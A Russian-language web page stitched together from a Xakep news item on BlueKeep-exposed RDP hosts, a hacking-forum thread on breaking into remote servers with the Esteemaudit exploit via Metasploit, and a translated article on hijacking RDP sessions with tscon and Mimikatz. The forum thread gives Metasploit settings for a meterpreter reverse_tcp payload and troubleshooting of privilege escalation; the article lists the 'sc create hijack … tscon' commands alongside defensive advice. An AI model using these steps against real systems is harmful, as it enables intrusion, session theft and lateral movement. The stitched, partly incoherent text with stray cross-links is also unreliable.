Взлом удаленного рабочего стола windows

Злоумышленники могут получить доступ к каждому десятому открытому удаленному рабочему столу

Xakep #263. Кредитки в опасности

Эксперты Positive Technologies подсчитали, что всего за три недели (с конца февраля 2020 года) количество ресурсов, доступных через RDP, увеличилось на 9% и составило более 112 000. При этом свыше 10% таких ресурсов уязвимы перед проблемой BlueKeep (CVE-2019-0708), которая позволяет атакующему получить полный контроль над компьютером на базе Windows.

Для атаки достаточно отправить специальный RDP-запрос к уязвимым службам удаленного рабочего стола (RDS). Аутентификации при этом не требуется. В случае успеха злоумышленник сможет устанавливать и удалять программы в скомпрометированной системе, создавать учетные записи с максимальным уровнем доступа, читать и редактировать конфиденциальную информацию. Уязвимости подвержены операционные системы Windows 7, Windows Server 2008 и Windows Server 2008 R2.

По динамике роста числа открытых по RDP узлов на сегодняшний день лидирует Уральский федеральный округ: оно увеличилось на 21%, а общая доля узлов, уязвимых для BlueKeep, составляет 17%. Далее идут Сибирский (21% и 16% соответственно), Северо-Западный (19% и 13%), Северо-Кавказский (18% и 17%), Южный (11% и 14%), Приволжский (8% и 18%), Дальневосточный (5% и 14%) и Центральный федеральные округа (4% и 11%).

«На сетевом периметре российских компаний начало увеличиваться число ресурсов, атака на которые позволит злоумышленникам получить контроль над сервером и проникнуть в локальную сеть, — отметил директор экспертного центра безопасности Positive Technologies Алексей Новиков. — Мы связываем это, в первую очередь, с поспешным переводом части сотрудников на удаленную работу. Независимо от выбранного типа удаленного подключения разумно обеспечить удаленный доступ через специальный шлюз. Для RDP-подключений это Remote Desktop Gateway (RDG), для VPN — VPN Gateway. Удаленное подключение напрямую к рабочему месту использовать не рекомендуется».

В Positive Technologies предупреждают, что открытие доступа к отдельным подсетям сразу всем пользователям VPN существенно снижает защищенность организации и не только дает широкие возможности внешнему атакующему, но и повышает риск атаки со стороны инсайдера. Поэтому IT-специалистам необходимо сохранять сегментацию сетей и выделять необходимое число VPN-пулов.

Помимо этого, Positive Technologies рекомендует обратить внимание на критически опасную уязвимость (CVE-2019-19781) в ПО Citrix, которое используется в корпоративных сетях, в том числе для организации терминального доступа сотрудников к внутренним приложениям компании с любого устройства через интернет. В случае эксплуатации этой уязвимости злоумышленник получает прямой доступ в локальную сеть компании из интернета. Для проведения такой атаки не требуется доступ к каким-либо учетным записям, а значит, выполнить ее может любой внешний нарушитель.

Статья Взлом RDP windows 2017

Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3

Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)

затем копируем руби скрипт в эту же папку командой:

Для работы скрипта по требуются еще и файлы:

копируем все в созданную нами папку:

Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.

задаем атакуемый RHOST

и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp

и конечно же наладим обратную связь: set LHOST

Читайте также:  Show seconds windows 10

и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS

а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:

nmap -sS -sC -sV -O -p3389

Удачи. ) и хех, помните мою доброту!))

Ondrik8

  • Сообщения 1 094
  • Реакции 3 144

Inject0r

Breed

Заблокирован

Lenar

Покажи хотя бы один пример что тебе удалось взломать один комп?
[doublepost=1503911101,1503909219][/doublepost]всегда вот такая хрень выскакивает при сканировании:

OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2, Linux 4.4, Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device

и как быть дальше?

Ondrik8

prodigy

ну давай, я ща тебе про свои подвиги все расскажу!
Вы вообще кто? И почему я тебе еще должен что то доказывать и показывать?

направление я дал дальше можете все изучить исходя из кода доработать, апгрейдить и юзать по полной!) Или Вы хотите что бы Вам зеро\дэй подарил?

ZZHup

ghostphisher

местный

1) Поставить себе на комп вирутальную машину, на нее поставить версии Win от первой Win Xp SP2 до Win 7
2) Пробовать эксплуатировать уязвимость, предварительно подняв и настроив сервер RDP
3) Писать сюда, если что то не получается

На данный момент, когда у Вас еще нет минимальных навыков, лезть с целью похекать чужое крайне необдуманный поступок

Lenar

Все манипуляции делаю на Kali Linux. Основной машиной стоит win7.
Kali и win xp service pack 3 стоят на виртуальной машине wmvare

скажите может Kali должен быть основной машиной?

ghostphisher

местный

Все манипуляции делаю на Kali Linux. Основной машиной стоит win7.
Kali и win xp service pack 3 стоят на виртуальной машине wmvare

скажите может Kali должен быть основной машиной?

woolf1514

yvv4recon

Foget

Ondrik8

prodigy

Дедок

я поражаюсь наглостью и амбициями ньюфагов и так же толерантности администрации к сабжам.

Чеб не офтопить:
Дополню статью видяшечкой по теме для наглядности..

llein

Launching Esteemaudit.
We are inside, waiting for meterpreter.
Exploit completed, but no session was created.

Почему может быть так? Все точно по инструкции.
Мб у меня должен быть открыт какой-то нестандартный порт?
Сижу со стационара через роутер, Кали основная
Объект со мной не в локалке
[doublepost=1504121608,1504114715][/doublepost]Предыдущий вопрос снимается. Решением ыло запускать это все не через Armitage, а через обычную консоль
Теперь другая проблема
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Dmitry88

Теперь другая проблема
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)[/quote]

Попробуй сначала UAC bypass.

Kirukato

Так этот эксплоит для доменной инфраструктуры. Вне домена не получится проэксплуатировать. Пришлось поднять домен в виртуальной машине чтобы проверить.

Ответ авторов на гитхабе :

the most rapid solution to testing the exploit is to virtualize two machine, a windows server edition from 2003 till 2012r2 to do as domain controller and a windows server 2003 or XP to do as Target. The exploit works only on a domain infrastructure, this is because it needs a CA to validate the certificate inside the logon request for smartcard authentication and it will create the callback needed to trigger the exploit. By default every domain controller applies a GPO that will authorize the machine target to log in with RDP smartcard logon.

Читайте также:  Voicemod для windows 10

Перехват RDP сессии с помощью tscon

В этой статье Raj Chandel научит нас перехватывать сеанс RDP с использованием различных методов. Эту технику злоумышленники используют для проникновения в инфраструктуру после получения доступа. Дальнейшее повествование идет от лица автора .

RDP представляет собой протокол удаленного рабочего стола, который работает по порту TCP / UDP 3389 и был разработан компанией Microsoft. Позднее RDP также начал работать и на других ОС. RDP позволяет пользователю подключаться к другому ПК удаленно, используя графический интерфейс. В Windows это стандартный способ для удаленного подключения, однако существует и множество аналогичных инструментов сторонних разработчиков, позволяющих удаленно управлять системами и приложениями.

В 2011 году RDP 6.0 поставляется с различными функциями. Эти функции перечислены ниже:

  • Приложения Windows Presentation Foundation
  • Поддержка нескольких мониторов
  • Перенаправление
  • Aero Glass Remoting
  • Шифрованное соединение
  • Уменьшение полосы пропускания
  • Поддерживает до 64 000 каналов для передачи данных

Когда инициируется соединение RDP и данные готовы к передаче, система шифрует их. Эти зашифрованные данные затем дополнительно добавляются в кадры для передачи. Затем данные передаются по принципу TCP / IP.

Wdtshare.sys – драйвер RDP, управляет графическим интерфейсом и отвечает за шифрование и передачу данных. Он также заботится о сжатии данных и добавлении их во фреймы. Tdtcp.sys – транспортный драйвер, убедившись, что данные готовы он отправляет их по сети на по TCP / IP.

Введение в Tscon

Tscon — это утилита Microsoft Windows, представленная в ОС Windows Server 2012. Она используется для подключения к другому сеансу на сервере узла сеансов удаленных рабочих столов. Для работы ей требуется назначение и идентификатор сессии. Учетные данные пользователя также могут быть переданы в качестве параметра в tscon.

Поняв протокол RDP и его работу, сосредоточимся на следующей составляющей — протокол RDP позволяет подключаться к другому пользователю в той же системе с помощью tscon.exe. И это то, что мы будем делать в этом методе. Сначала получим RDP-сеанс пользователя 1, то есть yashika, и как только установим RDP-соединение с yashika, получим RDP-соединение пользователя 2, то есть pavan, через yashika (user 1). Единственное условие в этом методе – нужны права администратора yashika (пользователь 1). Начнем с доказательства концепции.

Как можно видеть, на изображении ниже, у нас есть два пользователя — Yashika и Pavan

Теперь давайте получим IP-адрес yashika (user 1) с помощью команды ipconfig, как показано на рисунке ниже:

Запустим приложение для подключения к удаленному рабочему столу и введите IP-адрес целевой системы, в нашем случае это IP-адрес yashika (пользователь 1), а затем нажмите кнопку Connect, как показано на рисунке ниже:

Когда мы нажимаем кнопку «Подключиться», запрашиваются учетные данные для yashika (пользователь 1), как показано ниже:

После ввода учетных данных нажимаем кнопку «ОК», и как только мы нажимаем «ОК», графический интерфейс удаленного рабочего стола будет активирован. Теперь, когда есть доступ к yashika (пользователь 1), будем использовать пару команд из командной строки, чтобы сначала проверить информацию pavan (пользователь 2), такую ​​как их идентификатор пользователя, а затем будем использовать команду tscon для создания процесса, который будет взаимодействовать с pavan (пользователь 2), а затем запустим процесс для включения графического интерфейса удаленного рабочего стола pavan (пользователь 2).

binpath= «cmd.exe /k tscon /dest: «

query user
sc create hijack binpath= «cmd.exe /k tscon 2 /dest:rdp-tcp # 1»
net start hijack

И как вы можете видеть на изображении ниже, у нас есть графический интерфейс удаленного рабочего стола pavan (пользователь 2), который можно проверить с помощью команды whoami.

Читайте также:  Скрытые сетевые ресурсы windows

Теперь то же самое можно сделать через диспетчер задач. Единственное условие этого метода — знать учетные данные обоих пользователей. А затем, используя описанные выше метод , просто получаем удаленный рабочий стол пользователя yashika (пользователь 1), а затем открываем диспетчер задач и переходим на вкладку пользователя. На вкладке пользователя мы можем увидеть pavan (пользователь 1), как на картинке ниже. Кликним правой кнопкой мыши на pavan (пользователь 2). Появится раскрывающееся меню. В этом меню нажмем «Подключиться».

Как только мы нажимаем кнопку «Подключиться», мы получаем учетные данные pavan (пользователь 2), как показано на рисунке ниже:

Как только мы предоставим учетные данные, будет запущен удаленный рабочий стол пользователя pavan, как показано на рисунке ниже. И затем мы снова можем проверить сеанс с помощью команды whoami.

Еще один способ перехвата RDP — Mimikatz. Это один из лучших методов, так как в этом методе нет условий. Как только мы подключимся к yashika (user1), запустим Mimikatz. Используем следующую команду для получения различной информации о пользователе:

Получив необходимую информацию о пользователе, используем следующую команду для повышения привилегий:

И когда привилегии повышены, используем следующую команду, чтобы инициировать удаленное подключение GUI к pavan (пользователь 2):

здесь, в id: 1, 1 — номер сеанса, который мы получили с помощью команды ts :: session .

Как только вышеуказанный набор команд будет выполнен, осуществится удаленное подключение GUI к pavan (пользователь 2) через yashika (пользователь 1).

Для предотвращения взлома сеансов RDP необходимо:

  • Применять различные групповые политики, такие как авто log off после завершения RDP-сеанса,
  • Сегментация и межсетевое экранирование ЛВС,
  • Двухфакторная аутентификация,
  • Не отключать RDP полностью,
  • Убедится, что ваши сотрудники знают о том, как происходит взлом RDP,
  • Ограничить права доступа пользователя к RDP,
  • Регулярно проверять пользователей удаленного рабочего стола,
  • Мониторить tscon.exe,
  • Следить за всеми сервисами, использующими параметры cmd.exe / k или cmd.exe / c в отношении RDP.

Условия для практики

  • Для подключения к другому сеансу должно быть разрешение на полный доступ или специальное разрешение на подключение по RDP,
  • Параметр / dest: позволяет подключить сеанс другого пользователя к другому сеансу,
  • Если вы не укажете пароль в параметре

и целевой сеанс принадлежит другому пользователю, произойдет сбой tscon.

  • Вы не можете подключиться к сеансу консоли.
  • Злоумышленники могут подключаться к различным системам / пользователям в сети, используя RDP. Этот метод известен как перехват сеанса удаленного рабочего стола. Они могут использовать различные методы кражи учетных данных, но такие инструменты, как Mimikatz, позволяют перехватывать сеансы RDP, вообще не зная учетных данных. Большое количество сеансов RDP может выполняться как удаленно, так и локально как для активных, так и для отключенных сеансов с помощью следующих команд:

    query user
    sc create hijack binpath= «cmd.exe /k tscon 2 /dest:rdp-tcp # 1»
    net start hijack

    tscon.exe позволяет злоумышленнику получить сеанс RDP без ввода учетных данных. Взлом RDP-сеанса также может быть выполнен с помощью диспетчера задач (который описан выше в статье), для реализации такого метода с Mimikatz, используйте следующие команды:

    Перехват RDP сессии имеет большие последствия. Популярные С2 серверы (например, Cobalt Strike и Kodiac) позволяют инициировать RDP-соединение, что дополнительно приводит к перехвату RDP-сеанса. Мошенники часто перехватывают RDP, например, Lazarus Group использовала RDP для распространения, WannaCry пытался выполнить себя в каждом сеансе, Leviathan использовал целевые учетные данные RDP и использовал его для перемещения по сети, FIN8 также использовал RDP и т. д. Поэтому важно ознакомиться с со способами перехвата RDP, чтобы защитить себя, так как неосведомленность работает в пользу злоумышленников.

    Оцените статью